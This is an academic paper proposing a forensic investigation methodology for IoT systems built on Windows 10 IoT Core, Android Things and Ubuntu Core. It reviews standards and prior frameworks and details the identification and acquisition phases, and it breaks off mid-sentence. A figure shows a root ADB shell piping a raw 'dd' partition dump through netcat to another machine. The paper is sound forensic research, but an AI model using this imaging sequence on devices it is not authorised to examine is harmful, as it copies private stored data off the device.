

A Context-Centered Methodology for IoT Forensic Investigations

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Abstract The weakness of the security measures implemented on Internet of Things (IoT) devices, added to the sensitivity of the data that they handle, has created an attractive environment for cybercriminals to carry out attacks. This has caused a substantial increase in the number of cyberincidents, requiring the opening of digital investigations in order to shed light on what has occurred. However, the characteristics of this new environment, such as its variety of contexts, makes it impossible to use the methodology followed until now in conventional analysis. Therefore, a new common procedure is needed to ensure that IoT examinations are carried out in a complete and efficient manner. In this article, after reviewing the methodological requirements of IoT forensics, and studying the suggestions made by the research community, a methodology to perform investigations in a certain context of the IoT environment is proposed. In addition, its practicality is evaluated in three different security incident scenarios, proving its effectiveness and appropriateness to be used in future cases.

Declarations.

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1 Introduction

The broad definition given to the Internet of Things has made it very difficult to establish boundaries on what is considered the IoT, and the growth that this environment has experienced over recent years has not facilitated the task. The concept was introduced by Kevin Ashton in 1999, and it was used for the application of Radio Frequency Identification (RFID) in a supply chain [1]. More than twenty years later, it is still used for that purpose, but its range has expanded so immensely that we can no longer consider that the IoT exists only in an industrial context. On the contrary, it is almost impossible to imagine a scenario in which an IoT device cannot be present.

Unfortunately, the approach followed by developers in the design of security measures for IoT devices has not been as successful as their growth, and this is evidenced by the number of cyberattacks detected in the first half of 2019, which surpassed a hundred million, seven times higher than the previous year. On scrutinizing the data, it can be seen that 60% of the attacks targeted the Telecommunication Network (Telnet) [2] service, which is well known to be deprecated due to its security flaws. Additionally, the vector used in those attacks was mainly bruteforce, taking advantage of the weak default configuration of the devices and gaining access to them with the default credentials, which was also used in attacks aimed at the Secure SHell (SSH) service [3]. The combination of user and password such as “admin-admin” or “root-default” are incredibly com-

mon, and can be easily cracked by bruteforce or dictionary attacks [4].

As a consequence, the number of incidents in which IoT devices are involved has increased significantly, since cybercriminals can compromise them quite easily, and, in contexts such as eHealth or critical environments, the damage that they can cause is considerable. Under these circumstances, techniques are needed to guarantee that, when an incident arises, information can be properly recovered and analyzed to determine how it happened and adopt corrective measures, especially if the investigation requires the initiation of a legal process. But the same problem described for IoT security applies in forensics; this vast increase in cyberincidents calls for an improvement in this field, as there are no specific tools or methodologies for investigators to use in their analysis. This is due to the fact that the characteristics of the environment are too dissimilar from those in conventional forensics, so the current state of digital forensics cannot satisfy the requirements of IoT and provide techniques to perform complete and efficient investigations.

In addition, the procedure followed by analysts in incidents which require the initiation of a legal process will set the standards allowed in court when dealing with IoT-systems-related evidence, particularly in countries where there are no explicit laws regarding forensic investigations. For these reasons, the appropriate development and design of common methodologies for IoT forensics is essential in order to satisfy the requirements of both investigators and the environment, as it will have a big impact in the near future and an incorrect approach will certainly have a negative effect on the effectiveness of investigations.

The number of connected IoT devices reached seven billion in 2018, and it is expected to reach ten billion in 2020 [5]. These figures by themselves show the magnitude of the scenario, but the main issue arises when the segments in which those devices are used are analyzed: of sixteen hundred enterprise projects studied, 23% belonged to the smart city sector, followed by the “connected industry” with 17% and so on, eventually classifying the projects as belonging to one of ten different segments, dedicating one of these categories to “Other”, which reached a share of 8% [6]. Moreover, if the consumer sector is included in the study, data shows that 63% of the connected IoT devices are operating in it [7]. Therein lies the issue, the heterogeneity is too great to address the forensic problem from a general perspective; the number of IoT connected devices is significantly greater than the non-IoT ones, but they are so dissimilar to each other that each segment has its own special requirements. As a result, new terms

such as the Industrial Internet of Things (IIoT) are used to delimit the IoT environment and refer to a certain group of devices that are applied in a specific context. This reduction in the dimensionality of the scenario allows researchers to be able to address the issues in a more efficient and precise manner.

1.1 Contributions

The contributions of this study are as follows:

- We study the current state of IoT forensics, detailing the requirements and challenges of this new environment compared with those of traditional forensics.
- We present a review of the proposals from the research community in regard to the design of common procedures to perform IoT investigations.
- By exploiting the delimitation of the dimensionality of the IoT, we determine a specific context in which certain IoT systems with similar characteristics and purposes are used.
- Using the knowledge acquired after the analysis of said requirements and proposals, as well as the study of the delimited scenario, we introduce a methodology to conduct forensic investigations of the non-volatile memory of the IoT systems of this context.
- We present an evaluation of the proposed methodology in three security scenarios that could present in real life, proving that it is effective and appropriate to be followed by investigators in future cases.

The rest of the paper is organized as follows. Section 2 studies the standardization of digital forensics and the development of structured investigation models, Section 3 discusses the proposals from the community regarding new methodological approaches to carrying out examinations in IoT devices, and Section 4 describes the motivation behind this research. A methodology to perform investigations in a specific context of the IoT environment is introduced in Section 5. Section 6 evaluates its practicality in three different security incident scenarios. Finally, our conclusions are presented in Section 7.

2 Digital Forensics and the Pursuit of Standardization

The standardization of digital forensics is, as in every other forensic science, a duty rather than a necessity. Having a structured and formalized process that assures that an investigation is carried out with all the guarantees means that, regardless of the conclusions extracted,

the reliability, integrity and authenticity of the evidence presented cannot be questioned. In addition, following a standard process supports the credibility of an investigator and the admissibility of their work in a court of law.

Over the years, several process models have been proposed by the community, which was sought to adapt them to the requirements of the forensic investigations of the time. All of them have had the same objective: to provide investigators with a procedure to perform a complete and valid investigation. In [8], a study was carried out to review the models proposed since 1984 and extract the commonly shared phases, suggesting a generic process model based on them. The resulting design involved the inclusion of the following phases:

- Pre-Process: refers to the preparation work that is done before the actual investigation, such as the obtention of warrants and authorizations or tool set up.
- Acquisition & Preservation: addresses the identification, acquisition, collection, transportation and preservation of the data.
- Analysis: involves the study of the collected evidence in order to find relevant information to draw conclusions.
- Presentation: related to documentation of the findings obtained in the analysis phase.
- Post-Process: describes the task that needs to be performed in the closing of the investigation, such as the return of evidence.

In an effort to make the adoption of these models international and provide them with an official component, the standard organizations also made their own proposals, which are summarized in Table 1.

As can be observed, the standards are not up-to-date, therefore failing to address the requirements of new forensic scenarios, such as the IoT. In addition, their specificity is very low, meaning that the process is not detailed in a practical way, so investigators have an overall structure of what they must do, but they do not know how they should do it. This is a significant issue, especially when the evidence is being acquired and preserved. It is in these phases where the standards should be completely clear, thereby assuring the reliability and authenticity of the evidence.

For these reasons, researchers have opted to use the general process model as a reference, instead of standards. Having a clear procedure that has improved over the years and which has been approved by the community allows them to focus on addressing the specific requirements of certain contexts and create methodologies to perform investigations in them [15]. And this is

the case of the IoT; its characteristics are far too different from the conventional environments, a fact that demands the moulding of the existing standards and process models to fit the requirements of the new scenario, leading to the creation of new methodologies.

3 Related Work

One of the first articles in which the challenges and requirements of IoT forensics are addressed is [16], which highlights aspects such as the vast number of devices, their diversity and the concern about where their data is stored. Based on those challenges, an approach divided into network zones is proposed to perform investigations, and a triage model designed to collect the evidence before it becomes unavailable is also described. Two additional important issues are introduced in [17], which are the lack of standard techniques to examine and analyze the data, and the limited computational capacities of IoT devices. The relationship between the IoT and the cloud is also featured, emphasizing the splitting of the data over multiple locations and the legal problems regarding jurisdictions. A more recent proposal is [18], in which the authors carry out a very complete analysis, significantly extending the previous work and interestingly separating the review into taxonomies. They also provide various examples of use cases in IoT forensics, and introduce some pertinent topics such as the shutdown of the devices and the lifetime of the evidence. An extensive analysis is presented in [19], in which several proposals from the community between 2010 and 2018 are selected and reviewed. They are divided into three dimensions, depending on the aspect in which they are focused. One of these dimensions covers the development of forensic models and lists the related proposals, concluding that this topic is at an early stage, and that most of the models are based on hypothetical case studies, failing to provide a validation in practice. Based on this, the authors give some suggestions for the development of standards, such as prioritizing volatile data over non-volatile, standardizing data storage formats or preparing highly detailed reports.

Explicitly focusing on the methodologies, the only article whose proposal can be termed as such is [20], but it is focused on the privacy aspects of IoT investigations rather than offering a detailed forensic procedure to perform them. It introduces a very interesting concept, which is providing IoT devices with forensic software to collect relevant data that could be used in an investigation, turning them into “witnesses”, although the idea seems difficult to put into practice taking into account the computational capacities of the devices. Regarding

Table 1 Summary of the most relevant digital forensic standards

Standard	Year	Description
RFC 3227 [9]	2002	Describes a series of guidelines and principles for the collection and archiving of evidence in forensic examinations. It establishes an order of volatility for the evidence in a typical system, which has been used since its publication as a reference.
ISO/IEC 27037:2012 [10]	2012	Offers guidance on the overview, identification, collection, acquisition and preservation of digital evidence. Its centered on the following three types of devices: computers, peripheral devices and digital storage media; networked devices and CCTV.
ISO/IEC 27041:2015 [11]	2015	Addresses the design, implementation, verification and validation of the processes that are to be followed when an incident arises to assure their suitability and adequacy.
ISO/IEC 27042:2015 [12]	2015	Details guidelines for the analysis and interpretation of digital evidence. Both static and live examinations are described, even in non-imageable and non-copyable systems.
ISO/IEC 27043:2015 [13]	2015	Defines, in a general way, the principles and processes in an incident investigation, from the initialization to the closure phase.
ISO/IEC 27050:2016 [14]	2016	Describes the discovery phase of electronic stored information, involving the identification, preservation, collection, processing, review, analysis and production of the digital data. Its first part was updated in 2019.

the methodology proposed, it exhaustively details the privacy requirements of an IoT forensic investigation and, using the Enhanced Systematic Digital Forensic Investigation Model (ESDFIM) as a reference, defines a six-phase methodology. It relies on the use of a piece of software named “PRoFIT” to assist in the investigation. The proposal follows a general approach instead of focusing on a particular context, even though the existence of multiple dynamic and heterogeneous environments in the IoT is mentioned as an issue. The installation of the “PRoFIT” software is also based on a general concept and collides with the heterogeneity of the environment. Furthermore, making it compatible with all the different types and characteristics of devices seems extremely challenging, even though the idea is very attractive and would certainly allow investigators to make examinations easier and faster. In addition, the use case described is hypothetical and completely theoretical, since it is impossible to carry out a practical evaluation owing to the fact that this software has not been developed yet. On the other hand, the integration of the privacy ideas presented in the article on the design of future methodologies would have a tremendous impact on the assurance of the privacy necessities for the data that is handled in the investigations. Furthermore, the adaptation of the ESDFIM model to IoT forensics is a very compelling approach and, in the author’s opinion, is appropriate, bearing in mind the requirements of the scenario. It takes advantage of the most useful aspects of a traditional forensic model and successfully applies them in the IoT environment, which is of great value, considering that there were not any previous articles that enabled this process.

A model using Hadoop is proposed in [21] after reviewing three different approaches for retrieving inform-

ation from IoT devices. It covers everything from the beginning of a forensic investigation to the archiving of the evidence. Although it is not a very detailed model, it is divided into phases, and some interesting concepts are included. The first one is that the identification phase addresses the issue of having to examine devices that can be in different locations. Secondly, the acquisition procedure is defined as a live data extraction process, which fits the characteristics of IoT devices better than the traditional offline collection. It also mentions the necessity of relying on the conventional procedure in aspects such as the chain of custody, lab analysis and results.

In [22], a very complete and detailed framework is proposed. One of the main characteristics of this article is that the proposal complies with ISO/IEC 27043:2015, whose adaptation to the IoT environment is an interesting approach. The framework is divided into three modules: the proactive process, IoT forensics and the reactive process. The aspects into which the “IoT forensics” is divided (“Cloud Forensics”, “Network Forensics” and “Device Level Forensics”) do not suit the heterogeneity of the environment, even though the concern is mentioned in the “proactive process”. However, it is justified since the title of the article states that it is a generic approach, but this reduces its usefulness drastically. In the “reactive process” three entities are described: initialization, acquisition and investigation, which agrees with the approach followed by previous frameworks, although they are not very detailed. In addition, the proposal is compared with previous works, specifically [23], [21] and [16], and this definitely shows an improvement in the design of procedures to perform IoT investigations.

The lack of specificity in the cited works is an issue that is resolved in [24], in which a framework centered on smart home investigations is proposed. It is a flexible seven phase proposal, meaning that some phases might not be required in certain examinations. The acquisition phase is not detailed step by step, but the multiple possibilities that can exist regarding collection are briefly mentioned. In the analysis phase something similar occurs, but there is an interesting concept introduced, and that is performing a live analysis, something that is not common in conventional forensics. Even though the proposal is explicitly focused on the smart home context, it is also highlighted that there are multiple scenarios that can exist inside it, which implies that two investigations do not have to follow the same approach. In addition, the framework is tested in three practical case studies and, interestingly, all these investigations are carried out following a live analysis procedure.

Another remarkable aspect when designing methodologies is to have proper tools to work with. In [25], a study of the different domains of the IoT is carried out and a framework is proposed to conduct forensic investigations. It is divided into three layers: the “application server” layer, which covers the cloud infrastructure, the “communication layer”, centered on network connectivity, and the “device layer”, focused on the end devices. Based on this layout, ten open source tools are listed that can be used to collect and analyze data from all the different layers. Not all the proposed tools are IoT-centered, on the contrary, they are general tools that can be used in several forensic contexts, such as Autopsy [26], Wireshark [27], Guymager [28] or Xplico [29]. Although the list of tools is useful enough to perform an investigation in the IoT environment, this research reveals the lack of tools designed explicitly for the IoT, which is an important issue that must be addressed by the community, as it has a big impact on the speed and difficulty of the examinations.

There are some other interesting pieces of research regarding frameworks, such as [30] and [23], but they do not fit the characteristics of a methodology, and there is not much relevant information that can be applied to the proposal in this article, so they are not reviewed in detail. Likewise, several papers in which IoT systems or devices are analyzed have been published, such as [31], [32] or [33], among others, that are very helpful in understanding the approach to follow when investigating them, and such papers are worth taking into account in the development of methodologies.

After studying the proposals from the community, which are summarized in Table 2, it can be concluded that there are a lot of interesting articles for IoT forensic

investigations. There is little research centered specifically on designing methodologies, but several framework proposals, models and forensic studies that help understand how the creation of methodologies should be approached do exist. Regarding the frameworks and models proposed, the majority of them are designed from a theoretical point of view, which can lead to a misjudgment of the necessities of the environment. In addition, most of them are not evaluated to determine whether they are actually useful for performing investigations or not.

In this article, these deficiencies are addressed in the design of a context-centered methodology that is based on a previous practical forensic study carried out by the authors [34]. In it, a forensic analysis of the non-volatile memory of the Windows 10 IoT Core operating system was performed, listing the relevant information that can be obtained from it and be effectively used in future digital investigations of the system. Using the knowledge obtained from that study, and taking into account the suggestions from the community regarding IoT frameworks, models and forensic analysis, this proposal models the active investigation process in the context formed by systems with similar characteristics and purposes to Windows 10 IoT Core.

4 Research Motivation

In this section, the reasons to carry out this research are described, firstly addressing the necessity of designing a new methodology to perform forensic investigations in the IoT environment, and, secondly, discussing the situation of the design of IoT forensic methodologies.

4.1 Unsuitableness of Conventional Forensics

The procedure followed until now in forensic investigations do not consider certain characteristics of the IoT and its devices, either because the conventional ones did not have them or because they were not as significant as they are in this new context. These features, as it is described below, affect the examination process in a substantial way, which calls for a new approach to the way in which analysis are performed.

Diversity of devices and systems. In contrast to traditional forensics, IoT devices are designed to perform very diverse tasks in very different and specific contexts, such as smart homes, critical environments, eHealth or smart cities. Consequently, the multiplicity of IoT devices and systems is immense, none of them standing out in terms of market share and existing few of general use. In addition, most of them have scarcely

Table 2 Summary of the proposals from the community and comparison with this research

Proposal	Type	Context	Evaluation	Practicality	Detail Level	Approach	Limitations
[16]	Method	✗	✗	Medium	Low	Network zone division	Focused only on evidence location
[20]	Methodology	✗	Theoretical	Low	High	Phase division	Focused on privacy aspects
[21]	Model	✗	✗	Medium	Low	Phase division	Gives little insight on the investigation process
[22]	Framework	✗	✗	High	High	Module division	Lacks of practical perspective
[24]	Framework	Smart Home	Practical	Medium	Medium	Phase division	The practical phases are not technically detailed
[25]	Framework	✗	✗	Medium	Low	Layer division	Focused on describing what tools to use for each layer
This proposal	Methodology	OS de-limited	Practical	High	High	Phase division	First step towards introducing complete and useful IoT procedures

any similarities with mobile and desktop ones, so new suggestions on how to perform the analysis are needed.

Connectivity. The common IoT topologies consist of numerous devices that interact with each other to perform several actions, whereas in traditional forensics it is uncommon to encounter investigations involving multiple devices. The best example is a scenario in which there are sensors, actuators and a central node; the sensor is constantly sending data to the central node, which interprets it and sends (or not) an order to the pertinent actuator to carry out an action. In this simple case, there are three different devices with very diverse characteristics, and any of them can be the origin of an incident which, due to interaction, can end up affecting the whole network. Therefore, the investigation should be addressed from a collective perspective and not examine every device individually without considering the rest.

Computational capacities. IoT devices are designed to exchange information between each other rather than perform complex tasks, so their technical specifications are set accordingly. This means that their computational power is very low, as well as their storage and dedicated memory. Therefore, the data that is stored both in volatile and non-volatile memory has a very short lifetime, which affects an examination, firstly, since the amount of evidence that can be found is less and, secondly, due to the way in which the exchange of information is performed, usually on-the-fly without saving it in storage. A third reason is that the process of carving is more challenging as a result of the overwrite

of the small number of memory addresses that these devices have. Consequently, the IoT methodology needs an approach that allows the capture of that exchange of information properly, unlike traditional forensics that handle the evidence in a more static way. In addition, it needs to be very specific and detailed; the ability to find a piece of evidence is even more important than in conventional investigations, in which the discovery of multiple proofs can compensate for missing one.

Interaction with the cloud. The cloud has proven to be one of the most difficult scenarios in which to perform forensic investigations due to not being able to have physical access to the device from which data is going to be acquired, added to the bureaucracy needed to request data from the provider. In the IoT environment this issue is more serious, since the limited computational capacities of devices are compensated for with the usage of the cloud. Some architectures are even built in it, deploying the applications in the cloud and using it as a central node to perform the operations, and store practically all the data. Other contexts use the cloud as support to carry out operations such as back ups or to execute tasks that are demanding, but the basic functions rely on physical devices. In consequence, interaction with the cloud must be considered in the design of a forensic methodology in the IoT, something that was not necessary in the traditional context.

Physical access. IoT devices have such a compact size that this makes them very easy to install in small places or be embedded into other objects. In addition, they can be in different locations and still be part of

the same network, which complicates access to them for an investigator. For example, an industrial device can be inside the machine that it operates, or a smart city investigation could require accessing the sensors installed in the traffic lights of a part of a city. For this reason, the acquisition phase needs to be flexible and provide multiple collection methods depending on whether the investigator can have access to the device or not. This means that, in certain situations, the image of the storage must be obtained by following a live forensic acquisition process, which rarely occurs in traditional forensics.

Battery life. Some of the locations in which IoT devices are installed are not suitable for a connection to the mains electricity supply, so they use batteries as a power source. This has a great impact on the forensic examination if the investigator needs to perform a live forensic acquisition or analysis. Running completely out of battery means that the device will shutdown without saving its state, which causes an alteration of the data stored on it during the restart process, thus affecting the evidence. This is something that also happens in conventional forensics, specifically in smartphones, but it can be solved by using existing hardware acquisition devices, which do not exist for the IoT.

4.2 A Context-Centered Approach

As has been mentioned above, the most characteristic feature of the IoT is its heterogeneity. The data that is handled in each scenario is extremely specific, as are the devices and the operating systems that run on them, a fact that calls for a particular approach when an investigation is being carried out. In addition, certain situations, such as the ones related to eHealth, involve very sensitive information, which considerably increases the need for investigators to be extremely careful with the actions they perform and may require taking extraordinary measures. This means that a forensic investigation that is carried out in the IoT environment may have no similarities with any other in this environment.

On the other hand, as seen in Section 2, forensic sciences require standardization when a new paradigm appears since, as is the case of the IoT, there is an urgent need to establish useful means to avoid losing ground to the criminals, who have a clear advantage. Consequently, IoT forensics is facing a conundrum. The need to create a standard methodology is clear, but, since the definition of the IoT is too broad, a specific methodology cannot be designed to model all IoT devices, as it will definitely fail to satisfy all the requirements that the different scenarios have. Under these

circumstances, a more specific approach needs to be followed. The solution proposed by the authors is the design of methodologies to address certain contexts, while trying to make them as general as possible. In this proposal, the delimitation is made based on the similarities between three different IoT-based operating systems, namely Windows 10 IoT Core [35], Android Things [36] and Ubuntu Core [37], which allows us to model a specific methodology to perform complete and effective investigations on them, but also to provide general guidelines that could be used in other scenarios.

5 Proposed Methodology For Forensic Investigations in the IoT Environment

In this section, a methodology for performing forensic investigations in the IoT environment is proposed. In order to address the dimensionality issue of the IoT, the approach followed is to delimit the devices studied depending on the context in which they are used. First, the context on which the proposal is based is described, explaining which characteristics have been taken into consideration in order to define it, and, secondly, the phases into which the methodology is divided are described.

5.1 Context Description

The methodology has been modelled to work in three specific IoT-based operating systems, since they have common characteristics and are designed to perform a very specific role in a IoT network. This does not mean that these are the only scenarios in which the proposal can be put into practice, but they are the ones that benefit the most. For example, the acquisition phase is suitable to be followed for any IoT unit, but some details of it, such as the online acquisition, are explicitly designed for the operating systems of the context.

5.1.1 Operating Systems

Regarding the operating systems studied, they are light versions based on widely-used desktop and mobile systems, meaning that they are very complete and offer many functionalities. Therefore, they are heavier than a Real Time Operating System (RTOS) and require to be installed on a device with enough computational power, such as a Raspberry Pi. As a result, they are able to execute fairly complex applications and manage the information that is exchanged in the network, what makes them the most relevant device in it.

They are not designed explicitly for one purpose, on the contrary, they implement features to be used both in the enterprise and home sectors. This flexibility means that these systems can be found in multiple IoT scenarios, so the usefulness of designing a methodology for them is significant. Another relevant feature is that they provide a user-friendly graphical interface to interact directly with the system. This also allows applications to show information on an external screen, giving the user the option to control their functionality. The operating systems for which this methodology is designed are:

Windows 10 IoT Core. Launched in 2015 by Microsoft, it is the free version of the IoT family and it is compatible with ARM and x64/86 devices such as Raspberry Pi, DragonBoard or MinnowBoard. It is a combination of the desktop and mobile versions of Windows 10. The applications are developed with the Universal Windows Platform (UWP) and it supports several programming languages, such as C#, C++, Visual-Basic and JavaScript. Its main features are: PowerShell; File Transfer Protocol (FTP), SSH and web servers; Near Field Communication (NFC), RFID, WiFi and Bluetooth connectivity [35].

Ubuntu Core. This is the lightweight version of the Ubuntu desktop operating system, and was first released in 2014. It is based on snaps, since it is the package system used. By default, it does not offer a graphical interface, but this can be added manually. Snap applications can be programmed in multiple languages, including C, C++, Python, Java, Node.js and Go. It also provides an app store, from which multiple tools and servers can be installed, such as MQ Telemetry Transport (MQTT), Thingier.io or Nymea. It is compatible with several ARM and x86 boards such as Raspberry Pi, Samsung Artik, Intel Joule or Qualcomm DragonBoard, among others [37].

Android Things. This is the IoT version of the most widely-used operating system for mobile. Developed by Google, it was first previewed in 2016 and had its official release in 2018. Recently, it was announced that the platform will be refocused to work only with smart speakers and smart displays, ending hardware support for Qualcomm and Mediatek System on Modules (SoMs), but allowing the existing projects to keep functioning, limiting the updates to up to a hundred devices for non-commercial use [38]. Among its characteristics, it offers Bluetooth and Low-Power Wireless Personal Area Networks (LoWPAN) connectivity, and support interfaces such as General Purpose Input/Output (GPIO) and Pulse-Width Modulation (PWM). The applications are developed using the Android Software Development Kit (SDK), since it

has a specific library for Android Things, and can also be programmed in C and C++. After the announcement, it is only compatible with the NXP i.MX7D and Raspberry Pi 3 Model B boards [36].

5.1.2 Topology

The IoT topology that this methodology models is shaped for the characteristics of the above mentioned operating systems. The device that executes any of these operating systems, which we have named as “central node”, is the most relevant in the network, and the one that characterizes it. In addition to it, other embedded systems that perform simpler actions can be part of the topology as well. They do not necessarily have to be directly connected to the central node, as they do not need an intermediate node to communicate, but they are indirectly connected to it. The detailed description of the topology, which is shown graphically in a simplified version in Figure 1, is given below:

- Central node: executes the applications that provide functionality to the system. Normally, it receives information from the sensors and, based on that input, sends an order to the actuators or performs an action. From the forensic point of view, it is the most interesting source of evidence, as it is the one which stores the most information, it has access to the greatest number of devices and, therefore, almost all the data interchanged in the network pass through it. This is why, in this proposal, it is prioritized over other devices. In big networks or demanding ones, a multiple central node topology can be deployed, either with each node having the same importance as the others, or one of them managing the rest. In the operating systems that this proposal is focused on, this device is a single-board computer such as the Raspberry Pi.
- Sensors: collect information regarding the state of a variable in the environment. They are designed to carry out very simple tasks due to their limited computational capacities. Normally, they do not have an operating system installed, only firmware, but if they do, it is a very light one. The information that they store is limited, but its importance can be decisive, so they must be studied in the investigation. Generally, these types of devices are Arduino boards or similar.
- Actuators: their characteristics are almost identical to the sensors, but instead of collecting information, they execute an action.
- Control device: interacts with the IoT ecosystem through the services offered by the central node, such as a web portal or SSH. Generally, its main

Figure 1 Topology for which the methodology is built

purpose is to monitor the state of the system or send orders to the central node. The interaction with the central node leaves a trace, so it is interesting to study these devices.

5.2 Methodology Description

The model process used as a reference is the one mentioned in Section 2 with some slight changes. As this methodology is centered on providing practical instructions for investigations, the “Pre-Process” and “Presentation” phases are not detailed, since they have a more theoretical approach and can be addressed following the conventional methodologies. Due to the importance that the “Identification” process has in IoT investigations, and its increased complexity compared with the traditional ones, it has been selected as an independent phase, rather than including it in the “Acquisition” one. The increment in the amount of evidence to analyze requires the inclusion of an “Evaluation” phase, which is designed to model the management of the findings obtained from the different devices. The phases that make up the proposed methodology are the following:

- Identification: refers to the process of determining which devices existing in the scenario are capable of containing relevant data for the investigation.
- Acquisition: describes the operation that involves the creation of the forensic image of the devices that have been selected as relevant and, therefore, are going to be examined.

- Analysis: details the inspection of the data contained in each one of the IoT devices marked as relevant and the extraction of information to determine what happened to them.
- Evaluation: procedure to group all the information collected from the different devices in the analysis phase, and conclude how it fits into the environment as a whole.
- Post-Process: relates to the work carried out before closing the investigation. This includes writing and presenting the report, returning the sources of evidence seized and, in some cases, returning the IoT system to a functioning state.

5.2.1 Identification

It is one of the phases that requires a reformulation of the traditional approach due to one of the mentioned key features of the IoT environment: connectivity. The usual conditions will require the study of multiple devices, and, since the characteristics of each of them can be very different, from sensors to single-board computers, it is necessary to thoroughly evaluate the importance of the data contained in them, which leads to an increase in the complexity and range of the forensic analysis, both physically and logically.

Given the characteristics of the modelled context, the device that marks the dimensions of the range is the central node, since it interacts with the highest number of devices. In addition, it is the most plausible origin of the incident, and, by extension, the devices directly connected to it are the ones that are more likely of containing relevant information, being that the reason

why they are prioritized in this proposal. This also includes the control devices that interact with the IoT network. In order to confirm whether there are or were devices directly connected to the central node, it has to be examined. Depending on its state, the analysis will be carried out offline or online, although the former is preferable, focusing only on checking its connections. After that, the investigator will individually study each relevant connected device and determine whether it is more convenient to acquire it or to perform a live analysis on it.

However, it does not mean that the devices which are not directly connected to the central node should be discarded, as they can be the origin of the incident or have been affected by it, so they also should be considered as a possible source of evidence, but their priority is not that high. Furthermore, in some cases, another interesting component can be present: the router, through which all the packets exchanged in the network flow, and, if it has a non-proprietary firmware installed, such as Openwrt [39], its data can be easily accessed.

Surely, it is preferable to mark a device as relevant and collect its data, rather than ignoring it and create the possibility of missing crucial evidence. Thus, the investigator should only opt to ignore a device if they are completely sure that it does not contain any important data. In Figure 2, the representation of this phase in the form of a flowchart diagram can be observed.

5.2.2 Acquisition

The acquisition process for the non-volatile memory can be fairly simple or highly challenging depending on the type of device that the investigator is dealing with. On the one hand, there are boards such as the Raspberry Pi, which have storage in the form of a microSD card. For these devices, the acquisition is quite common and easy; the device is shut down and, afterwards, the microSD is extracted and placed into a write blocker to protect the integrity and it is either cloned or imaged.

On the other hand, there are multiple manufacturers who design their devices with the storage soldered to the board, and the tendency for new boards seems to be to adopt this layout, particularly in ones that do not require great storage capacity. This complicates the acquisition process considerably, as the investigator has to choose between implementing a chip-off, a Joint Test Action Group (JTAG)/Universal Asynchronous Receiver Transmitter (UART) or an In-System Programming (ISP), which are very delicate operations, as can be seen in [40], [41], [42] and [43]. In addition, they also require specific equipment, especially in the case of the chip-off.

For this reason, a pertinent concern rises: is the offline acquisition the best approach to follow in the IoT environment? If the investigator wishes to maintain the forensic soundness of the evidence, the answer is clear: yes, since an online analysis can compromise the integrity of the evidence and may not be acceptable in a court case. However, taking into account the form in which the non-volatile storage is present in these devices, the best solution in most cases would be to acquire the relevant data directly by interacting with the device when it is on, or even to carry out the whole analysis online. This particularly applies when the investigator has no physical access to the device, and also when no other option works, since the JTAG, ISP and chip-off methods cannot always be carried out. Furthermore, the issue with the simpler devices such as sensors or actuators is that, although they have a very limited storage and computing capacity, the retrieval of the data that they store can be completed faster and more successfully by directly interacting with the device rather than having to perform a JTAG, ISP or a chip-off. Also, there is a high chance that the inappropriate execution of a chip-off can lead to the destruction of the evidence. Hence, maybe sacrificing part of the forensic soundness is justified in order to ensure the retrieval of the data stored in IoT devices, and this is a concern that must be studied by the forensic community to determine whether a change of procedure is required, and a broader definition of forensic soundness needs to be applied in the IoT environment, as it should not be too big a limitation on the acquisition process.

In this methodology, as it is shown in Figure 3, the authors have opted to prioritize forensic soundness. As a result, the order for choosing the collection methods established is the following:

- Extraction and acquisition: it is the most harmless technique, as it ensures that no information has been altered and the device does not suffer any damage, guaranteeing its continued functioning.
- JTAG or ISP: the best options for non-removable storage. Normally, they do not damage the device, and the process is feasible for an ordinary investigator, although both of them require of a specific connector to access the memory data. ISP is destined to acquire flash memories in the form of an embedded Multi Media Card (eMMC) or an embedded Multi Chip Package (eMCP), which are not always compatible with the JTAG technique.
- Chip-off: it is the most difficult method, requiring knowledge of soldering and specific equipment, and it does not allow the device to work again, compromising its functioning.

Figure 2 Flowchart diagram of the proposed identification phase

– Live acquisition: with this procedure, the integrity of the data is compromised, as the investigator must interact with the device to execute the tool for the image creation, leaving a trace and altering the state in which the device was found. However, the device does not suffer any damage.

Regarding the tools that can be used to perform the acquisition, as previously mentioned, there are no specific ones for the IoT, so the investigator must use general ones. Furthermore, at the time of designing this proposal there are no tools compatible with Windows 10 IoT Core that can assure a complete storage acquisition, so a live collection is not a viable option for this operating system. Therefore, it is preferable to perform a live analysis on that system rather than trying to copy the files stored in it, since not all the information can be obtained with this method. For Android Things, whose live acquisition is described below, and it is shown graphically in Figure 4¹, and Ubuntu Core, the best option is to use the “dd” [44] command, which is included by default in both operating systems.

¹ The output of the “mount” command has been cropped in order to reduce the size of the image, only showing the most relevant partitions in the system.

- Connect the forensic computer to the same network that the IoT device is connected to.
- Forward a non-used port from the device to the forensic computer.
- Start a remote shell on the device using the Android Debug Bridge (ADB) [45], become the superuser (no password needed) and execute the “dd” command, pipelining its exit using “netcat” [46], which is included in the toybox suite [47], which is integrated by default in the system.
- Immediately launch “netcat” on the forensic computer to listen on the port previously set, and append the output to a file.
- Wait until the “dd” command has finished and close the connection on the forensic computer.

If the investigator wants to store the image on an external drive, they need to mount it in the system and execute the “dd” command, setting the output file directory as the location where the drive has been mounted.

Figure 3 Flowchart diagram of the proposed acquisition phase

```

ADB terminal
ubuntu@ubuntu-VirtualBox:~$ adb forward tcp:8888 tcp:8888
ubuntu@ubuntu-VirtualBox:~$ adb shell
130|rpil3:/ $ su
rpil3:/ # whoami
root
rpil3:/ # mount
/dev/root on / type ext4 (ro,seclabel,relative,data=ordered)
/dev/block/mmcblk0p11 on /vendor type ext4 (ro,seclabel,relative,data=ordered)
/dev/block/mmcblk0p19 on /data type ext4 (rw,seclabel,nosuid,nodev,noatime,errors=panic,data=ordered)
/dev/block/mmcblk0p17 on /oem type ext4 (ro,seclabel,nosuid,nodev,relative,block_validity,delalloc,barrier,user_xattr,acl)
rpil3:/ # dd if=/dev/block/mmcblk0p19 | toybox nc -l -p 8888
3548848+0 records in
3548848+0 records out
18170176 bytes transferred in 1021.238 secs (1779223 bytes/sec)
^C

Forensic Computer
ubuntu@ubuntu-VirtualBox:~$ nc 127.0.0.1 8888 >android.dd
^C
ubuntu@ubuntu-VirtualBox:~$ ls -l android.dd
-rw-r--r-- 1 ubuntu ubuntu 18170176 ago 23 19:35 android.dd
    
```

Figure 4 Live acquisition of the “data” partition in the Android Things operating system

As can be seen in Figure 5², the procedure is similar for the live acquisition in the Ubuntu Core operating system; the main difference is that the SSH service is used instead of ADB. When the system is first installed

² The output of the “mount” command has been cropped in order reduce the size of the image, only showing the most relevant partitions in the system.

